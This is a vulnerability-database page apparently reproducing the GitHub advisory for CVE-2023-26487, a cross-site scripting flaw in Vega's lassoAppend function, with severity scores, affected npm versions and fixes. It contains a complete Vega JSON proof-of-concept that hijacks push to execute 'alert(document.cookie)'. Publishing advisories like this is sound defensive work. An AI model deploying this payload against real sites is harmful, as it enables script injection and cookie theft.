6.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-26487

GHSA ID

GHSA-w5m3-xh75-mp55

EPSS Score

0.37505%

CWE

CWE-79

Published

3/2/2023

Updated

3/13/2023

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-26487

CVE-2023-26487: Vega has Cross-site Scripting vulnerability in `lassoAppend` function

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

(GitHub Advisory)

6.1

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-26487

GHSA ID

GHSA-w5m3-xh75-mp55

EPSS Score

0.37505%

CWE

CWE-79

Published

3/2/2023

Updated

3/13/2023

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
vega	npm	< 5.23.0	5.23.0
vega-functions	npm	< 5.13.1	5.13.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems directly from lassoAppend's lack of type checking on its first argument. The commit diff shows the fix adds array type enforcement via 'vega-util' and replaces push() with array spread syntax. The PoC demonstrates exploitation by passing an object with a malicious push property pointing to event.view functions. This function's direct interaction with untrusted input and unsafe push operation makes it the clear entry point for XSS.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry V***'s `l*sso*pp*n*` *un*tion: `l*sso*pp*n*` ****pts * *r*um*nts *n* int*rn*lly invok*s `pus*` *un*tion on t** *st *r*um*nt sp**i*yin* *rr*y *onsistin* o* *n* *n* *r* *r*um*nts *s `pus*` **ll *r*um*nt. T** typ* o* t** *st *r*um*nt is sup

Reasoning

T** vuln*r**ility st*ms *ir**tly *rom l*sso*pp*n*'s l**k o* typ* ****kin* on its *irst *r*um*nt. T** *ommit *i** s*ows t** *ix ***s *rr*y typ* *n*or**m*nt vi* 'v***-util' *n* r*pl***s pus*() wit* *rr*y spr*** synt*x. T** Po* **monstr*t*s *xploit*tion

6.1

Basic Information

Concerned about an active attack path?

CVE-2023-26487: Vega has Cross-site Scripting vulnerability in `lassoAppend` function

Summary

Details

PoC

Impact

6.1

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI